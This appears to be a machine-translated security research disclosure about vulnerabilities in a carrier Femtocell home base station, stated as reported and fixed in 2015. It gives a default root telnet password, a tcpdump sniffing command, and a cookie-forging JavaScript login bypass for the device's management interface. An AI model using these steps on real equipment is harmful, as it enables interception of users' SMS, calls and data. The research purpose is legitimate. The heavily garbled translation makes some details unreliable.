Ali mobile security team with the Chinese Thiel Laboratory of wireless technology Ministry of communication experts together, the combination of domestic operator a type of Femtocell base station for the security analysis, found that the more pieces of the major vulnerabilities that can lead to users of SMS, calls, data traffic is eavesdropping. A malicious attacker can in free to apply for a Femtocell device, quickly transform it into a pseudo-base bulk SMS controller and a traffic Sniffer, the impact of the public communication security. The home base station(Femtocell, also known as fly cellular, Femto is intended 1 0-1 5 th)is operator in order to solve indoor coverage problems and the introduction of IP-based network to the micro base station device, typically deployed in the user's home, or even placed directly on the desktop. As the operator network construction is substantially complete, the macro Station basic no longer increases, Femtocell as a network optimization stage solve the signal coverage of blind spots the most effective means, times by the operators favor. Due to the Femtocell via the IP with the operator core network is directly connected, and from user side of view, are completely legitimate base station equipment. Femtocell is generally installed in the user accessible position, which is that has been hiding in the communications room of this natural physical security barrier shelter under the traditional communication vendors, and finally to accept the world hack review. However, the traditional communication vendors in the development of safety consciousness, leading to a communication device of the security vulnerabilities abound. In recent years, the BlackHat and DEFCON Security Conference repeatedly exposed Femtocell security issues. Vulnerability details has in 2 0 1 5 year 5 month 2 1 day inform the relevant operator, the relevant manufacturers have been targeting the vulnerability of the whole network equipment for emergency repair, the current vulnerability has been fixed completed. For advance security research consider now the vulnerability details public. 1 Board overview 1.1 devices to get How to get a Femtocell device? In 2 0 1 5 year 4 beginning of the month, I give 1 0 0 8 6 call reports that the house the signal is poor(it does so). 1 0 0 8 6 say if the family has broadband, you can free to install a small base station. Over two days, the installation engineer will come to install. ! Femtocell equipment typical installation location as shown below: ! The maximum transmit power 30dBm, only 1W. And the General of the GSM base station power is about 20W or so. Femtocell after the installation, the effect is indeed very good. The original indoor GSM signal only, occasionally"no signal"in the house the phone often could not get through. Femtocell turned on, the signal suddenly becomes a full grid, but the standard is GPRS. Everyone home no signal words, you can call 1 0 0 8 6 application, and the application is also free of charge. And the subsequent words, the operator has been in preparation for 3G and 4G Femtocell. Than the need to frame the outdoor and the indoor antenna of the Repeater scheme stable lot, and the erection of convenient. In 2 0 1 4 years 1 0 months, the clouds have someone submit the Femtocell vulnerability is one. According to records, in 2 0 1 5 years 1 month is the repair is completed, the vulnerability disclosure. This article inspired us to continue to Femtocell devices for security analysis. Found some new holes, and Old the bug fixes is also not complete. 1.1 hardware composition Open discovery inside there are two circuit boards, both through the custom standard cable is connected, the initial guess of the cable has at least the network cable 4 root. The piece is a normal WLAN AP with Atheros SoC chip, and generally a home router is no different. ! Another block for the RF Board, mainly by the following three components: TI 345MHz DSP+ARM processor OMAPL138B Cyclone FPGA RF agile Controller AD9365(lower left corner) ! 1.2 network topology ! 2 WLAN Board card penetration 2.1 root weak password You can directly telnet to login, and then one with root access to the Linux shell. $ telnet 192.168.197.1 login: root password: 5up Incidentally, this password should be the Atheros reference design Board PB44 the default password, many manufacturers used are not modified. On the search engines with"5up"and"root"as the keywords, can search to a lot of interesting things. And found that the above busybox substantially no cropping, even the tcpdump function. So, you can directly crawl to all connected to this WiFi traffic: busybox tcpdump-i br0 not port 2 3 2.2 other use /mnt/flash/nvm/femtoOamStore. db is a Sqlite3 file, you can use sqlitebrowser to view directly Flashing lights /mnt/flash/led_ctrl.sh [on|off] 3 RF Board card penetration 3.1 Web login bypass Access http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser get user name for abmoc@2 4 3 2 0 Then in the USER. js found the original of the log to bypass the problem not been fixed, then open in the browser Console, enter the following script to logon: SetCookie('role', 'marketUser'); SetCookie('username', 'abmoc@2 4 3 2 0'); SetCookie('levels', [-2, 0, 1, 3, 1 1, 1 3, 1 5, 1 6]); document. cookie = "loginFlag=1;"; window. top. location = 'main. asp? r=' + Math. random() + '#index'; After Login, we have with the operator sent to open the station engineers exactly the same as the operation permission! The following are some of the Management Interface screenshot: ! ! ! However, before the discovery of the aeration out of the file uploading and downloading interface, as well as the Welcome text messages sent under the interface code has been completely deleted! But really deleted?